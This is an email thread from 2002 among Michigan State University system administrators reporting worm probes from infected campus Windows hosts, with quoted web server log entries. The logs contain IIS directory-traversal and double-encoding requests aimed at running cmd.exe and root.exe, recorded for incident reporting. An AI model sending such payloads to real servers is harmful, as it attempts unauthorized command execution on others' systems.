I own one of them and am also in the process of cleaning it up. ( llc.msu.edu server) This server had only been online for a few hours before being struck. Owch! My apologies for any inconvenience. MVK >I own three of them (.nscl.msu.edu machines) and am cleaning them up ASAP. > >Thanks for the info. Sorry for any inconvenience. > >Katie Clark >Computer Support >National Superconducting Cyclotron Laboratory >Michigan State University >(517) 333-6338 > >-----Original Message----- >From: MSU Network Administrators Group [mailto:[log in to unmask]]On >Behalf Of Paul Donahue >Sent: Monday, January 21, 2002 9:27 AM >To: [log in to unmask] >Subject: Re: MS Virus or Worm activity > > >Not to be a "me-too"er but I have noticed the same from the same IP >addresses on one of our windows boxes. ZoneAlarm showed approximately >400 alerts since 6pm Friday until 8am this morning. > > > > >Paul Donahue >Lead Computer/Network Technician >CVM Information Technology Center >A227 VMC, Michigan State University >Phone: 353-5551 Fax: 432-2937 > >>>> [log in to unmask] 01/21/02 08:51AM >>> >Probes from these hosts started coming in just before 11:00pm Saturday >night: > >35.8.164.90 - bigone.hrt.msu.edu >35.8.33.189 - fpc04.nscl.msu.edu >35.8.34.114 - cycpc54.nscl.msu.edu >35.8.33.203 - talon.nscl.msu.edu >35.8.107.198 - No host name in DNS. Domain: llc, > Language Learning Center in Old Hort > > >Probe examples: > >35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET >/MSADC/root.exe?/c+dir >HTTP/1.0" 404 286 >35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 >35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET >/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 >35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 >35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" >404 327 >35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" >404 327 >35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy >ste >m32/cmd.exe?/c+dir HTTP/1.0" 404 343 >35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 >35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 >35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 >35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 >35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293 >35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293 >35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 >35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 > >-- >Gene Willacker, Systems Analyst >MSU Division of Housing and Food Service >Food Stores Building >171 Service Road >East Lansing, MI 48824-1233 >517-353-1691 -- Michael V. Kramizeh Language Laboratory Manager Language Learning Center Michigan State University Rm. 131 Old Horticulture Bldg. East Lansing, MI 48824 517-355-7587 Phone 517-432-5246 Fax E-Mail: [log in to unmask]